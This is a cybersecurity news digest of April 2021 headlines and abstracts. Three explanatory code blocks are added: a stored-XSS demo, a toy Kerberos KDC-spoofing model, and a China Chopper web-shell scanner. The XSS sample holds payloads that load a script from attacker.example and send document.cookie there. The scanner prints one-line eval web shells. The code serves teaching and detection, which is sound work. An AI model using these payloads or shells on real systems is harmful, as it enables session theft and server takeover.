Bad actors with suspected ties to China have been behind a wide-ranging cyberespionage campaign targeting military organizations in Southeast Asia for nearly two years, according to new research. Attributing the attacks to a threat actor dubbed "Naikon APT," cybersecurity firm Bitdefender laid out the ever-changing tactics, techniques, and procedures adopted by the group, including weaving new backdoors named "Nebulae" and "RainyDay" into their data-stealing missions. The malicious activity is said to have been conducted between June 2019 and March 2021. "In the beginning of the operation the threat actors used Aria-Body loader and Nebulae as the first stage of the attack," the researchers said. "Starting with September 2020, the threat actors included the RainyDay backdoor in their toolkit. The purpose of this operation was cyberespionage and data theft." Naikon (aka Override Panda, Lotus Panda, or Hellsing) has a track recorThe Hacker News
April 29, 2021 – Ransomware
DoppelPaymer Ransomware Gang Releases Court and Prisoner Files Stolen from Illinois Attorney General Office Full Text
Abstract
The files were published on a dark web portal managed by the DoppelPaymer ransomware gang and also include personally identifiable information about state prisoners, their grievances, and cases.The Record
April 29, 2021 – Malware
Researchers Uncover Stealthy Linux Malware That Went Undetected for 3 Years Full Text
Abstract
A previously undocumented Linux malware with backdoor capabilities has managed to stay under the radar for about three years, allowing the threat actor behind the operation to harvest and exfiltrate sensitive information from infected systems. Dubbed "RotaJakiro" by researchers from Qihoo 360 NETLAB, the backdoor targets Linux x64 machines, and is so named after the fact that "the family uses rotate encryption and behaves differently for root/non-root accounts when executing." The findings come from an analysis of a malware sample the firm detected on March 25, although early versions appear to have been uploaded to VirusTotal as early as May 2018. A total of four samples have been found to date on the database, all of which remain undetected by most anti-malware engines. As of writing, only seven security vendors flag the latest version of the malware as malicious. "At the functional level, RotaJakiro first determines whether the user is root or non-The Hacker News
April 29, 2021 – Malware
Water Pamola Campaign Targeted E-Commerce Sites in Japan, Australia, and Europe via Malicious Orders Full Text
Abstract
Water Pamola sent online shopping orders appended with a malicious XSS script to attack e-commerce administrators. These scripts were managed with an XSS attack framework called "XSS.ME."Trend Micro
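The Water Pamola technique above is stored XSS: attacker-controlled order fields are later rendered, unescaped, in the administrator's back-office page. As an added example (not Trend Micro's analysis or any shop's code), the block below renders a constructed hostile order both naively and with context-aware escaping, and includes a small parser-based check that reports active content (script tags, on* handlers) in the rendered fragment rather than grepping for substrings, which would misfire on escaped text. Field names and the order payload are constructed.

```python
"""Stored XSS through an order form field, and the escaping that neutralises it.

Added example, not code from the Water Pamola write-up. The order, its field
names and the admin-table template are constructed for illustration.
"""
import html
from html.parser import HTMLParser
from typing import Dict, List

# Constructed order as a hostile customer could submit it: "customer" carries a
# script tag, "note" breaks out of a double-quoted attribute to add a handler.
HOSTILE_ORDER: Dict[str, str] = {
    "order_id": "A-1042",
    "customer": '<script src="https://attacker.example/hook.js"></script>',
    "note": "gift wrap\" onmouseover=\"fetch('https://attacker.example/?c='+document.cookie)",
}

ROW_TEMPLATE = ('<tr><td>{order_id}</td><td>{customer}</td>'
                '<td title="{note}">note</td></tr>')


def render_row_vulnerable(order: Dict[str, str]) -> str:
    """Admin view that trusts order fields: exactly the bug the campaign abuses."""
    return ROW_TEMPLATE.format(**order)


def render_row_hardened(order: Dict[str, str]) -> str:
    """Escape every field for HTML text and attribute context (quote=True turns
    both ' and " into entities, so the attribute cannot be closed early)."""
    safe = {key: html.escape(value, quote=True) for key, value in order.items()}
    return ROW_TEMPLATE.format(**safe)


class ActiveContentFinder(HTMLParser):
    """Collects script-like elements and event-handler attributes as the
    browser's parser would actually see them."""
    ACTIVE_TAGS = {"script", "iframe", "object", "embed"}

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in self.ACTIVE_TAGS:
            self.findings.append(f"<{tag}>")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")
            elif name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"{tag}@{name}=javascript:")


def find_active_content(fragment: str) -> List[str]:
    """Return the active-content findings for a rendered HTML fragment."""
    finder = ActiveContentFinder()
    finder.feed(fragment)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    print("vulnerable:", find_active_content(render_row_vulnerable(HOSTILE_ORDER)))
    print("hardened:  ", find_active_content(render_row_hardened(HOSTILE_ORDER)))
```

The parser-based check matters for the hardened output: the escaped note still contains the literal text `onmouseover=`, but inside an attribute value it is inert, and only a real tokenizer tells the two cases apart.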
April 29, 2021 – Phishing
Bitcoin scammers phish for wallet recovery codes on Twitter Full Text
Abstract
The scam isn’t being spread by just one account, nor is there just one bogus support form. Multiple Twitter profiles lurk in the replies of anyone having a bad cryptocoin experience.Malwarebytes Labs
April 29, 2021 – Malware
New Shameless WeSteal Commodity Cryptocurrency Stealer and WeControl Commodity RAT Full Text
Abstract
The author of WeSteal, a new commodity cryptocurrency stealer, makes no attempt to disguise the intent for his malware. The seller promises “the leading way to make money in 2021”.Palo Alto Networks
April 28, 2021 – Vulnerabilities
Google Chrome V8 Bug Allows Remote Code-Execution Full Text
Abstract
The internet behemoth rolled out the Chrome 90 stable channel release to address this and eight other security vulnerabilities.Threatpost
April 28, 2021 – General
Hillicon Valley: Parler app risks charges of selling out with Apple return | Justices hear First Amendment clash over cheerleader’s Snapchat | Google pressed to conduct racial equity audit Full Text
Abstract
Parler said it will be back in the Apple App Store this week with approved changes, but those updates may come with the risk of losing the platform’s base users over accusations of selling out to Big Tech and losing its pro-free speech model. Speaking of free speech, a high schooler’s Snapchat about failing to make the varsity cheerleading team is at the center of a crucial First Amendment Supreme Court case. And pressure is mounting for Google to take action in line with its public statements on race, with a civil rights organization calling on the company to conduct a racial equity audit.The Hill
April 28, 2021 – Solution
Can the Bytecode Alliance secure the supply chain with WebAssembly? Full Text
Abstract
The Bytecode Alliance, which counts Intel, Mozilla, Microsoft, and Fastly among its members, announced that it formed a non-profit organization to focus on promoting WebAssembly (WASM) and the WebAssembly System Interface (WASI) as emerging standards that can fix some of the inherent weaknesses in the way software gets developed.SCMagazine
April 28, 2021 – Privacy
Lawmakers introduce legislation to create civilian reserve program to fight hackers Full Text
Abstract
A group of bipartisan lawmakers in the House and Senate on Wednesday rolled out legislation that would create a National Guard-style program to help defend critical systems against increasing cyberattacks from nation states and criminals.The Hill
April 28, 2021 – Phishing
Scammers imitate Windows logo with HTML tables to slip through email gateways Full Text
Abstract
Email security solutions featuring machine learning or computer vision should be able to identify the fake logo and sniff out the attack.SCMagazine
April 28, 2021 – Phishing
Click Studios says stop tweeting: Phishers track breach notification info to craft new lures Full Text
Abstract
Companies are often pilloried in the wake of data breaches for lacking transparency or leaving their users in the dark about potential impact. This incident demonstrates the flip side of that coin, how information or communications from a company following a breach can be weaponized by bad actors.SCMagazine
April 28, 2021 – Breach
DigitalOcean data breach exposes customer billing information Full Text
Abstract
Cloud hosting provider DigitalOcean has disclosed a data breach after a flaw exposed customers' billing information.BleepingComputer
April 28, 2021 – APT
Naikon APT group uses new Nebulae backdoor in attacks aimed at military orgs Full Text
Abstract
China-linked APT Naikon employed a new backdoor in multiple cyber-espionage operations targeting military organizations from Southeast Asia in the last 2 years. The Naikon APT group is a China-linked cyber espionage group that has been active...Security Affairs
April 28, 2021 – Vulnerabilities
Microsoft Office SharePoint Targeted With High-Risk Phish, Ransomware Attacks Full Text
Abstract
SharePoint servers are being picked at with high-risk, legitimate-looking, branded phish messages and preyed on by a ransomware gang using an old bug.Threatpost
April 28, 2021 – Attack
Fourth time’s a charm - OGUsers hacking forum hacked again Full Text
Abstract
Popular hacking forum OGUsers has been hacked for its fourth time in two years, with hackers now selling the site's database containing user records and private messages.BleepingComputer
April 28, 2021 – Policy and Law
DOJ building the guardrails for Microsoft Exchange-type malware takedowns Full Text
Abstract
Demers said the department would evaluate the Exchange operation to try to generalize future standards, and that such infiltration of private systems would not be a “tool of first resort.”SCMagazine
April 28, 2021 – Malware
Malware Increasingly Using TLS to Hide Communication Full Text
Abstract
Malware actors have doubled the number of attacks leveraging TLS communications, helping them stay hidden from security systems. Only a few are using self-signed certificates.Cyware Alerts - Hacker News
April 28, 2021 – Policy and Law
US Arrests Alleged Crypto Mixer Full Text
Abstract
Man suspected of laundering around $336m in Bitcoin via a crypto-mixing service is arrestedInfosecurity Magazine
April 28, 2021 – Criminals
A Ransomware Gang is Now Shorting Stock Price of its Victims Full Text
Abstract
The Darkside group has advanced its extortion tactics to target companies that are listed on NASDAQ or other stock markets. However, the chances of this technique succeeding are narrow, say experts.Cyware Alerts - Hacker News
April 28, 2021 – Breach
Sensitive source codes exposed in Microsoft Azure Blob account leak Full Text
Abstract
The data included files that appeared to originate from a series of pitches made to Microsoft Dynamics from numerous companies vying for a project or partnership with the company.Hackread
April 28, 2021 – General
Data Breach Impacts 1 in 4 Wyomingites Full Text
Abstract
Wyoming Department of Health exposes test results of more than a quarter of state residents on GitHubInfosecurity Magazine
April 28, 2021 – Ransomware
Ransomware Payment Demands Rose by 43% So Far in 2021 Full Text
Abstract
The average demand for a digital extortion payment shot up in the first quarter of this year to $220,298, up 43% from the previous quarter, according to a quarterly report from Coveware.Cyberscoop
April 28, 2021 – Business
DevSecOps Company Sysdig Raises $188 Million at $1.19 Billion Valuation Full Text
Abstract
The latest funding round, which brings the total raised by the company to $394 million, was led by Premji Invest & Associates and Third Point Ventures, with participation from several other investors.Security Week
April 28, 2021 – Malware
New stealthy Linux malware used to backdoor systems for years Full Text
Abstract
A recently discovered Linux malware with backdoor capabilities has flown under the radar for years, allowing attackers to harvest and exfiltrate sensitive information from compromised devices.BleepingComputer
April 28, 2021 – Phishing
SMS phishing scam lures Rogers customers with outage refunds Full Text
Abstract
Cybercriminals target Rogers customers with a new SMS phishing campaign pretending to be refunds for last week's Canada-wide wireless outage.BleepingComputer
April 28, 2021 – Business
Alsid SAS Acquired by Tenable Full Text
Abstract
Tenable acquires Active Directory security firm and launches new solutionInfosecurity Magazine
April 28, 2021 – Phishing
Passwordstate hackers phish for more victims with updated malware Full Text
Abstract
Click Studios, the software company behind the Passwordstate enterprise password manager, is warning customers of ongoing phishing attacks targeting them with updated Moserpass malware.BleepingComputer
April 28, 2021 – Business
Secrets management and authentication platform Akeyless raises $14M Full Text
Abstract
Akeyless, a SaaS platform for authentication and digital access, has offices in New York and Tel Aviv and says the round will be put toward hiring and global expansion to grow its customer base.Venture Beat
April 28, 2021 – Criminals
Cybercriminals Widely Abusing Excel 4.0 Macro to Distribute Malware Full Text
Abstract
Threat actors are increasingly adopting Excel 4.0 documents as an initial stage vector to distribute malware such as ZLoader and Quakbot, according to new research. The findings come from an analysis of 160,000 Excel 4.0 documents between November 2020 and March 2021, out of which more than 90% were classified as malicious or suspicious. "The biggest risk for the targeted companies and individuals is the fact that security solutions still have a lot of problems with detecting malicious Excel 4.0 documents, making most of these slip by conventional signature based detections and analyst written YARA rules," researchers from ReversingLabs said in a report published today. Excel 4.0 macros (XLM), the precursor to Visual Basic for Applications (VBA), is a legacy feature incorporated in Microsoft Excel for backward compatibility reasons. Microsoft warns in its support document that enabling all macros can cause "potentially dangerous code" to run. The eveThe Hacker News
April 28, 2021 – Government
G7 Nations Sign Declaration to Keep the Internet Safe and Open Full Text
Abstract
The declaration has come amid concerns about the influence of illiberal nations and big tech in cyberspaceInfosecurity Magazine
April 28, 2021 – Vulnerabilities
Google addresses a high severity flaw in V8 engine in Chrome Full Text
Abstract
Google released updates for Chrome 90 that address a new serious issue, tracked as CVE-2021-21227, in the V8 JavaScript engine used by the web browser. Google has released security updates for Chrome 90 that address a new high severity vulnerability,...Security Affairs
April 28, 2021 – General
Cloud security tops among list of skills needed to pursue cyber career Full Text
Abstract
Problem solving and analytical thinking were among the most important soft skills named by cyber professionals.SCMagazine
April 28, 2021 – Phishing
Chase Bank Phish Swims Past Exchange Email Protections Full Text
Abstract
Two phishing attacks elude Exchange security protections and spoof real-life account scenarios in an attempt to fool victims.Threatpost
April 28, 2021 – Government
Cyberspies target military organizations with new Nebulae backdoor Full Text
Abstract
A Chinese-speaking threat actor has deployed a new backdoor in multiple cyber-espionage operations spanning roughly two years and targeting military organizations from Southeast Asia.BleepingComputer
April 28, 2021 – Phishing
Deep Analysis: FormBook New Variant Delivered in Phishing Campaign – Part III Full Text
Abstract
When FormBook starts in a target process, it loads an ntdll.dll module and then overrides its data with the deployed FormBook malware. This disguises FormBook as an ntdll.dll module when it runs.Fortinet
April 28, 2021 – Vulnerabilities
F5 BIG-IP Found Vulnerable to Kerberos KDC Spoofing Vulnerability Full Text
Abstract
Cybersecurity researchers on Wednesday disclosed a new bypass vulnerability in the Kerberos Key Distribution Center (KDC) security feature impacting F5 BIG-IP application delivery services. "The KDC Spoofing vulnerability allows an attacker to bypass the Kerberos authentication to Big-IP Access Policy Manager (APM), bypass security policies and gain unfettered access to sensitive workloads," Silverfort researchers Yaron Kassner and Rotem Zach said in a report. "In some cases this can be used to bypass authentication to the Big-IP admin console as well." Coinciding with the public disclosure, F5 has released a patch to address the weakness. Kerberos is an authentication protocol that relies on a client-server model for mutual authentication and requires a trusted intermediary called Key Distribution Center (KDC), a Kerberos Authentication Server (AS) or a Ticket Granting Server in this case, that acts as a repository of shared secret keys of all users as weThe Hacker News
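KDC spoofing, as a class, works when a service validates a user's password by asking the KDC for a TGT and treating "the AS-REP decrypted with the key derived from the typed password" as proof, while never checking that the KDC it talked to is the real one. An attacker who can redirect the service's KDC traffic answers with a forged AS-REP built from whatever password they typed. The fix is to additionally request a service ticket for the service's own principal and verify it with the service's own key (its keytab), which a rogue KDC cannot forge. The model below is an added example of that exchange, not F5's or Silverfort's code: tickets are HMAC-sealed JSON rather than real Kerberos ASN.1, realm, principals and passwords are constructed, and PBKDF2 stands in for Kerberos string-to-key.

```python
"""Toy model of Kerberos password verification with and without KDC validation.

Added example, not F5 BIG-IP or Silverfort code. Tickets are HMAC-sealed JSON,
PBKDF2 stands in for string-to-key, and REALM/users/SPN are constructed.
"""
import hashlib
import hmac
import json
import os
from typing import Dict, Optional

REALM = "EXAMPLE.ORG"                      # constructed
SERVICE_SPN = "HTTP/apm.example.org"       # constructed service principal
SERVICE_KEY = hashlib.sha256(b"constructed keytab key for HTTP/apm").digest()


def derive_key(password: str, salt: str) -> bytes:
    """Stand-in for Kerberos string-to-key."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 1000)


def seal(key: bytes, payload: dict) -> dict:
    """Stand-in for an encrypted ticket: body plus HMAC under the key."""
    body = json.dumps(payload, sort_keys=True).encode()
    return {"body": body.hex(), "mac": hmac.new(key, body, hashlib.sha256).hexdigest()}


def open_sealed(key: bytes, blob: dict) -> Optional[dict]:
    """Return the payload if the MAC verifies under key, else None."""
    body = bytes.fromhex(blob["body"])
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, blob["mac"]):
        return None
    return json.loads(body)


class Kdc:
    """Legitimate KDC: holds every user key and every service key."""
    def __init__(self, realm: str, user_passwords: Dict[str, str], service_keys: Dict[str, bytes]):
        self.realm = realm
        self.user_keys = {u: derive_key(p, realm + u) for u, p in user_passwords.items()}
        self.service_keys = service_keys

    def as_req(self, user: str) -> Optional[dict]:
        key = self.user_keys.get(user)
        return None if key is None else seal(key, {"cname": user, "ticket": "tgt"})

    def tgs_req(self, user: str, spn: str) -> Optional[dict]:
        skey = self.service_keys.get(spn)
        return None if skey is None else seal(skey, {"cname": user, "sname": spn})


class RogueKdc:
    """Attacker's KDC: knows no real secret, only the password the attacker typed,
    which is enough to mint an AS-REP that "decrypts" with that password."""
    def __init__(self, realm: str, attacker_password: str):
        self.realm, self.pw = realm, attacker_password

    def as_req(self, user: str) -> Optional[dict]:
        return seal(derive_key(self.pw, self.realm + user), {"cname": user, "ticket": "tgt"})

    def tgs_req(self, user: str, spn: str) -> Optional[dict]:
        return seal(os.urandom(32), {"cname": user, "sname": spn})   # cannot know SERVICE_KEY


def verify_password_naive(kdc, realm: str, user: str, password: str) -> bool:
    """Spoofable: trusts whichever KDC answered."""
    rep = kdc.as_req(user)
    return rep is not None and open_sealed(derive_key(password, realm + user), rep) is not None


def verify_password_hardened(kdc, realm, user, password, spn, keytab_key: bytes) -> bool:
    """Also obtain a ticket for our own SPN and check it with our keytab key."""
    if not verify_password_naive(kdc, realm, user, password):
        return False
    ticket = kdc.tgs_req(user, spn)
    if ticket is None:
        return False
    opened = open_sealed(keytab_key, ticket)
    return opened is not None and opened["cname"] == user and opened["sname"] == spn


REAL_KDC = Kdc(REALM, {"alice": "alice-secret"}, {SERVICE_SPN: SERVICE_KEY})
ROGUE_KDC = RogueKdc(REALM, "attacker-typed-password")


def demo() -> Dict[str, bool]:
    """Run the four interesting cases and return their outcomes."""
    return {
        "real_kdc_correct_naive": verify_password_naive(REAL_KDC, REALM, "alice", "alice-secret"),
        "real_kdc_wrong_naive": verify_password_naive(REAL_KDC, REALM, "alice", "wrong"),
        "rogue_kdc_naive": verify_password_naive(ROGUE_KDC, REALM, "alice", "attacker-typed-password"),
        "real_kdc_correct_hardened": verify_password_hardened(REAL_KDC, REALM, "alice", "alice-secret", SERVICE_SPN, SERVICE_KEY),
        "rogue_kdc_hardened": verify_password_hardened(ROGUE_KDC, REALM, "alice", "attacker-typed-password", SERVICE_SPN, SERVICE_KEY),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case}: {'accepted' if ok else 'rejected'}")
```

The case to watch is `rogue_kdc_naive`: the naive check accepts a password the real KDC has never seen, which is the bypass the advisory describes; the hardened check fails because the rogue KDC cannot produce a ticket that verifies under the service's keytab key.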
April 28, 2021 – Covid-19
#GartnerIAM: Pandemic Disruption Necessitates a Transformation in Identity Access Management Full Text
Abstract
IAM has to be radically altered in light of distributed workforcesInfosecurity Magazine
April 28, 2021 – Ransomware
UK rail network Merseyrail hit by ransomware gang Full Text
Abstract
UK rail network Merseyrail was hit by a cyberattack; the ransomware operators used the breached corporate email system to disclose the attack to employees and journalists. UK rail network Merseyrail, which operates rail services across Merseyside, announced...Security Affairs
April 28, 2021 – Ransomware
UK rail network Merseyrail likely hit by Lockbit ransomware Full Text
Abstract
UK rail network Merseyrail has confirmed a cyberattack after a ransomware gang used their email system to email employees and journalists about the attack.BleepingComputer
April 28, 2021 – Vulnerabilities
An Analysis of VB6 P-Code Obfuscation Full Text
Abstract
One of the formats that has not seen common obfuscation has been the Visual Basic 6 P-Code byte streams. This is a proprietary opcode set, in a complex file format, with limited tooling available.Avast
April 28, 2021 – Malware
Attention! FluBot Android Banking Malware Spreads Quickly Across Europe Full Text
Abstract
Attention, Android users! A banking malware capable of stealing sensitive information is "spreading rapidly" across Europe, with the U.S. likely to be the next target. According to a new analysis by Proofpoint, the threat actors behind FluBot (aka Cabassous) have branched out beyond Spain to target the U.K., Germany, Hungary, Italy, and Poland. The English-language campaign alone has been observed to make use of more than 700 unique domains, infecting about 7,000 devices in the U.K. In addition, German and English-language SMS messages were found being sent to U.S. users from Europe, which Proofpoint suspects could be the result of malware propagating via contact lists stored on compromised phones. A concerted campaign aimed at the U.S. is yet to be detected. FluBot, a nascent entry in the banking trojan landscape, began its operations late last year, with campaigns leveraging the malware infecting more than 60,000 users in Spain, according to an analysis published bThe Hacker News
April 28, 2021 – Breach
Security Spending Doubles but Two-Fifths of Firms Suffer Breaches Full Text
Abstract
Hiscox claims just a fifth of organizations are cyber “experts”Infosecurity Magazine
April 28, 2021 – Vulnerabilities
Cloud misconfiguration, a major risk for cloud security Full Text
Abstract
Misconfigured cloud-based databases continue to cause data breaches, millions of database servers are currently exposed across cloud providers. Fugue’s new State of Cloud Security 2020 report reveals that misconfigured cloud-based databases continue...Security Affairs
April 28, 2021 – Policy and Law
GitHub disables Google FloC user tracking on its website Full Text
Abstract
GitHub has announced rolling out a mysterious HTTP header on all GitHub Pages sites to block Google FLoC tracking.BleepingComputer
April 28, 2021 – Malware
RedLine Stealer Masquerades as Telegram Installer Full Text
Abstract
The .NET-based malware has recently been disguised as an installer of the popular secure messaging app Telegram. Like most .NET malware, the fake setup file is packed and highly obfuscated.Minerva Labs
April 28, 2021 – Ransomware
Average Ransom Surges 43% After Accellion Attacks Full Text
Abstract
Coveware claims Clop group drove up cybercrime gains in Q1 2021Infosecurity Magazine
April 28, 2021 – Covid-19
COVID-19, WFH prompts spike in cyberattacks against banks, insurers Full Text
Abstract
The coronavirus pandemic and working from home (WFH) requirements are causing a "significant" spike in attacks against financial entities, new research by BAE Systems Applied Intelligence suggests.ZDNet
April 28, 2021 – Covid-19
#COVID19 Rattles Banks and Insurers as Security Budgets Are Slashed Full Text
Abstract
Financial firms and their customers suffer surge in attacks during 2020Infosecurity Magazine
April 28, 2021 – Vulnerabilities
Google Patches Yet Another Serious V8 Vulnerability in Chrome Full Text
Abstract
The vulnerability, tracked as CVE-2021-21227 and rated high severity, was reported to Google by researcher Gengming Liu from the Chinese cybersecurity firm Singular Security Lab.Security Week
April 28, 2021 – Government
Australian government’s major IT shops to help others with cybersecurity Full Text
Abstract
The Australian government is planning on establishing three 'Cyber Hub' pilots that will see departments such as Defence, Home Affairs, and Services Australia provide cyber services for other ones.ZDNet
April 28, 2021 – Ransomware
New WickrMe Ransomware Targets SharePoint Servers to Infiltrate Corporate Networks Full Text
Abstract
SharePoint now joins a list of network devices used as entry points by threat actors that also includes Citrix gateways, F5 BIG-IP load balancers, Microsoft Exchange email servers, and more.The Record
April 27, 2021 – Government
DARPA moves forward in quest for zero-knowledge proofs for vulnerability disclosure Full Text
Abstract
The effort could allow security researchers to publicly prove the existence of a vulnerability without also giving away their underlying research to attackers.SCMagazine
April 27, 2021 – Solution
Microsoft Edge to add automatic HTTPS option for all domains Full Text
Abstract
Microsoft Edge will automatically redirect users to a secure HTTPS connection when visiting websites using the HTTP protocol, starting with version 92, coming in late July.BleepingComputer
April 27, 2021 – APT
An APT Group Exploits VPN to Deploy Supernova on SolarWinds Orion Full Text
Abstract
The U.S. CISA has disclosed details of a new APT that leverages the Supernova backdoor to compromise SolarWinds Orion installations after gaining access to the network through a VPN service.Cyware Alerts - Hacker News
April 27, 2021 – General
Hillicon Valley: Acting FTC chair urges Congress to revive agency authority after Supreme Court ruling | Senate Intel panel working on breach notification bill Full Text
Abstract
Acting Federal Trade Commission Chair Rebecca Kelly Slaughter was back on Capitol Hill Tuesday, urging Congressional action to revive the commission's authority in light of a Supreme Court decision last week. Meanwhile, Senate Intelligence Committee Chairman Mark Warner (D-Va.) announced upcoming legislation from his committee around mandatory data breach notification, and two key senators hinted at renewed action to create federal standards on self-driving cars.The Hill
April 27, 2021 – Hacker
Hackers Threaten to Leak D.C. Police Informants’ Info If Ransom Is Not Paid Full Text
Abstract
The Metropolitan Police Department (MPD) of the District of Columbia has become the latest high-profile government agency to fall victim to a ransomware attack. The Babuk Locker gang claimed in a post on the dark web that they had compromised the DC Police's networks and stolen 250 GB of unencrypted files. Screenshots shared by the group, and seen by The Hacker News, include various folders containing what appears to be investigation reports, arrests, disciplinary actions, and other intelligence briefings. Also called the DC Police, the MPD is the primary law enforcement agency for the District of Columbia in the U.S. The ransomware gang has given the department three days to heed their ransom demand or risk leaking sensitive files that could expose police informants to criminal gangs. "Hello! Even an institution such as DC can be threatened, we have downloaded a sufficient amount of information from your internal networks, and we advise you to contact us as soon as pThe Hacker News
April 27, 2021 – Policy and Law
Kik Tip Leads to Kindergarten Teacher’s Arrest Full Text
Abstract
Cyber-tip about child sexual abuse material sharing leads to arrest of Indiana teacherInfosecurity Magazine
April 27, 2021 – Government
FBI shares with HIBP 4 million email addresses involved in Emotet attacks Full Text
Abstract
The FBI has shared with the Have I Been Pwned service 4 million email addresses collected by the Emotet botnet and used in malware campaigns. Last week, European law enforcement conducted an operation aimed at performing a mass-sanitization of computers...Security Affairs
April 27, 2021 – Vulnerabilities
Microsoft SharePoint vulnerability and China Chopper web shell used in ransomware attacks Full Text
Abstract
Researchers reported that to ignite a ransomware payload, the attackers abuse a Cobalt Strike beacon. The researchers believe the China Chopper web shell was used in a likely attempt to circumvent detection with known samples.SCMagazine
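The three SharePoint items above (the phishing lures, the WickrMe ransomware intrusions, and this one) share one post-exploitation artefact: a China Chopper web shell dropped on the server. As an added example, not the researchers' detection logic, the block below is a signature scan for the well-known one-line forms of that shell, an ASPX page that `eval()`s a request parameter, a PHP page that `eval()`s a POST parameter, and the older ASP `Execute(Request(...))` form. File names, contents and the directory layout are constructed; the extension list is an assumption about which files are worth reading on a SharePoint or generic IIS host.

```python
"""Signature scan for China Chopper style one-line web shells.

Added example, not code from the SCMagazine report or the researchers it
cites. Sample file names and contents are constructed; SCAN_EXTENSIONS is
an assumption about which files merit a look on a web server.
"""
import re
from pathlib import Path
from typing import Dict, List, Tuple

SIGNATURES: List[Tuple[str, "re.Pattern[str]"]] = [
    # ASPX form: <%eval(Request.Item["..."],"unsafe");%>
    ("aspx: eval(Request.Item[...], \"unsafe\")",
     re.compile(r'eval\s*\(\s*Request\.Item\s*\[[^\]]+\]\s*,\s*"unsafe"\s*\)', re.I)),
    # PHP form: <?php @eval($_POST['...']);?>
    ("php: eval($_POST/$_GET/$_REQUEST[...])",
     re.compile(r'@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[[^\]]+\]\s*\)', re.I)),
    # Classic ASP form: <% Execute(Request("...")) %>
    ("asp: Execute(Request(...))",
     re.compile(r'\bExecute\s*\(\s*Request\s*\(', re.I)),
]

SCAN_EXTENSIONS = {".aspx", ".ashx", ".asp", ".php"}   # assumed


def scan_text(name: str, text: str) -> List[Dict[str, object]]:
    """Return one finding per (line, signature) hit in a file's text."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in SIGNATURES:
            if pattern.search(line):
                findings.append({"file": name, "line": lineno, "signature": label})
    return findings


def scan_tree(root: Path) -> List[Dict[str, object]]:
    """Walk a web root and scan every file with a scannable extension."""
    findings: List[Dict[str, object]] = []
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_EXTENSIONS:
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            findings.extend(scan_text(str(path), text))
    return findings


# Constructed samples: one shell per family plus a benign page.
SAMPLES: Dict[str, str] = {
    "layouts/diag.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "layouts/status.aspx": '<%@ Page Language="C#" %>\n<html><body><%= DateTime.UtcNow %></body></html>',
    "uploads/img.php": "<?php @eval($_POST['cmd']); ?>",
    "old/admin.asp": '<% Execute(Request("c")) %>',
}


def scan_samples() -> Dict[str, List[str]]:
    """Scan the constructed samples; map file name to the signature labels hit."""
    return {name: [str(f["signature"]) for f in scan_text(name, text)]
            for name, text in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name}: {hits or 'clean'}")
```

A signature scan like this only catches the unmodified one-liners; a shell renamed or lightly obfuscated will slip past, so treat hits as a fast first pass and pair it with file-integrity checks on the web root and review of recently modified server-side pages.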
April 27, 2021 – Ransomware
Babuk Ransomware Gang Targets Washington D.C. Police Full Text
Abstract
The RaaS developers thumbed their noses at police, saying “We find 0 day before you.”Threatpost
April 27, 2021 – Government
FBI shares 4 million email addresses used by Emotet with Have I Been Pwned Full Text
Abstract
Millions of email addresses collected by Emotet botnet for malware distribution campaigns have been shared by the Federal Bureau of Investigation (FBI) as part of the agency's effort to clean infected computers.BleepingComputer
April 27, 2021 – Breach
HashiCorp reveals exposure of private code-signing key after Codecov compromise Full Text
Abstract
HashiCorp, a software company making automated cloud deployment tools, has revealed a private code-signing key was exposed thanks to the compromised Codecov script discovered earlier this month.The Register
April 27, 2021 – Policy and Law
Senate Intelligence panel working on legislation around mandatory cyber breach notification Full Text
Abstract
The Senate Intelligence Committee is working on a bill to create some form of limited data breach mandatory reporting for the private sector, with the goal of preventing future major foreign cyberattacks on critical organizations.The Hill
April 27, 2021 – General
Cybersecurity Webinar: Understanding the 2020 MITRE ATT&CK Results Full Text
Abstract
The release of MITRE Engenuity's Carbanak+FIN7 ATT&CK evaluations every year is a benchmark for the cybersecurity industry. The organization's tests measure how well security vendors can detect and respond to threats and offer an independent metric for customers and security leaders to understand how well vendors perform on a variety of tasks. However, for the uninitiated, the results can be hard to decipher and contextualize properly. Unlike many benchmarks that compare participants in a competitive manner, MITRE's framework evaluates companies exclusively on how they respond to the tests. This means that customers must really know what they're looking for. A new webinar (register here) aims to provide some clarity on what to look for and how to interpret the results. Cynet's new live webinar will dig a little deeper into the MITRE ATT&CK evaluation. The company's research team will break down how the evaluations work, what the results mean, anThe Hacker News
April 27, 2021 – Phishing
Threat Actors Impersonate Chase Bank Full Text
Abstract
Cyber-criminals launch credential phishing attacks targeting Chase bank customersInfosecurity Magazine
April 27, 2021 – Government
CISA, NIST published an advisory on supply chain attacks Full Text
Abstract
CISA and NIST published a report on software supply chain attacks that sheds light on the associated risks and provides instructions on how to mitigate them. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the National Institute...Security Affairs
April 27, 2021 – Hacker
Another SolarWinds lesson: Hackers are targeting Microsoft authentication servers Full Text
Abstract
Mandiant Tuesday detailed a new attack strategy against Microsoft’s Active Directory Federation Services (AD FS). Researchers believe the need to protect AD FS might be the unheralded second lesson from the SolarWinds campaign.SCMagazine
April 27, 2021 – Breach
MangaDex discloses data breach after stolen database shared online Full Text
Abstract
Manga scanlation site MangaDex disclosed a data breach last week after learning that the site's user database was privately circulating among threat actors.BleepingComputer
April 27, 2021 – Ransomware
Qlocker Ransomware is Targeting QNAP Devices Full Text
Abstract
The Qlocker group was spotted using 7-Zip to move files on QNAP devices into password-protected archives. It generated about $260,000 within a week by remotely encrypting files.Cyware Alerts - Hacker News
April 27, 2021 – Hacker
Hackers Exploit 0-Day Gatekeeper Flaw to Attack MacOS Computers Full Text
Abstract
